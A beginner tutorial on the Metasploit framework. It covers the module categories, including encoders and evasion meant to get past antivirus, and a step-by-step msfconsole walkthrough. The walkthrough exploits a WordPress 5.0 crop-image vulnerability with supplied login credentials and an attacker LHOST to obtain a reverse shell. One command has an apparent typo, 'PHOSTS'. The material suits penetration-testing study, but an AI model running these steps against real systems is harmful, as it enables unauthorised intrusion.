Metasploit is an open-source penetration testing framework and a suite of security tools used for a myriad of purposes like information gathering, scanning, pen testing, exploiting, encoding, firewall evasion, and even post-exploitation phase. The framework is constituted of different categories and modules which makes Metasploit perfect to use as it can be used for all the phases of hacking from reconnaissance to clearing tracks. This is a beginner-friendly tutorial on getting started with the Metasploit framework and its commands.
“Msfconsole“ is the primary interface to the Metasploit framework. This is the command line interface for the framework which can be launched by typing in msfconsole in the command line. This opens up the msfconsole interface in which we can use different Metasploit options and commands. A GUI version tool of the Metasploit framework also exists which is “Armitage“. It is pre-installed in Kali Linux. The advantage of using msfconsole over the GUI version is that we can run external commands like ‘ping’, ‘ifconfig’ etc. in the interface itself and also get tab auto-completion.
Major Categories of Metasploit
Metasploit framework is built on 7 major categories each containing modules that can be used in each hacking phase. A brief introduction to each of the 7 categories is given below:
Category 1: Exploit
Exploit is a piece of code that uses a vulnerability present in the target system. The exploit module is very neatly organized and contains modules for all the known exploits for a vulnerability in any software/service.
Category 2: Auxiliary
Any module under this category is mostly used for scanning and information gathering. Modules like scanners, crawlers, sniffers, etc. can be found here.
Category 3: Payload
Payloads are the code that will run on the target system. Exploit only leverages the vulnerability present in the system. But if we want the exploit to have the result we would want (gaining access, installing a back door, popping up a reverse shell), we need to use a payload.
Category 4: Post
Post contains all the modules that can be used for the post-exploitation phase.
Category 5: Encoders
The exploits or payloads we use to exploit a target system can often be blocked by the target system that is using a signature-based anti-virus solution. Encoders are used to encode an exploit in the hopes of being undetected by the anti-virus.
Category 6: NOP (No Operation )
The modules in this category are used to provide a buffer that conveys the system to do literally nothing.
Category 7: Evasion
Even if we encode the exploits or payloads, evasion techniques can also be used above it to evade antivirus software.
Examples of Metasploit
Below is a more understandable example of leveraging a vulnerability present in the WordPress site version 5.0 to access the target system. An NMAP version scan (nmap -sV <IP>) on the target system reveals that the target system is running WordPress version 5.0. Now let’s see some examples of the basic commands and the process used in msfconsole to exploit the target system running WordPress 5.0.
Step 1: Searchsploit
Searchsploit is a command line search tool for Exploit-DB used to search for any publicly known exploits for a particular operating system, application, or service running on the target system. The search result gives all the known exploit modules which can be used in msfconsole to exploit and gain access to the target system.
Step 2: Search
Searches module names and descriptions of exploits or payloads that can be used to leverage any known vulnerability for a given service or application. Depending on the rank of the modules returned, we can use the relevant exploit or payload and use it for exploitation. In the below example, We also gave the kind of exploit that we wanted to use.
msf6 > search wordpress 5.0 crop image
Step 3: Use
Use command is used to select the exploit or payload module we are going to use against the vulnerable version of the software or service. The use command lets us select the module to further be able to set parameters of the host and target machines which can then be used for exploitation.
msf6> use exploit/multi/http/wp_crop_rce
The module to be used can also be selected with the use command followed by the number(index) at the beginning of the search result line.
Step 4: Info
Info command gives any additional information of the module used within the context. It contains information about the exploit name, description of the payload, the year it was disclosed, etc.
msf6 > info
Step 5: Show
Show options is a command used to show all the parameters or environment variables that need to be set before exploiting a target system. After the hacker selects a suitable exploit to use against the target system using the “use” command, he/she is required to set the IP address, port of the target system, and also username and password for authentication into the application if the target system is running an application like WordPress. The show command shows all the required parameters that need to be set before exploiting the target.
msf6 > show options
Step 6: Set
The set command is used in conjunction with the show command where it is used to set the necessary parameters like LHOST, LPORT, RHOST, RPORT, username, and password. LHOST and LPORT refer to the attacker’s system’s (in this case us) IP address and port. RHOST and RPORT refers to the victim’s IP and port.
msf6 > set LHOST 10.18.51.89 msf6 > set PHOSTS 10.10.36.242 msf6 > set USERNAME kwheel msf6 > set PASSWORD cutiepie1
Step 7: run/exploit
This command is used to launch the exploit after successfully setting the required parameters. Depending on the payload, the payload can pop up a reverse TCP shell or install a backdoor or gain a root shell.
msf6 > exploit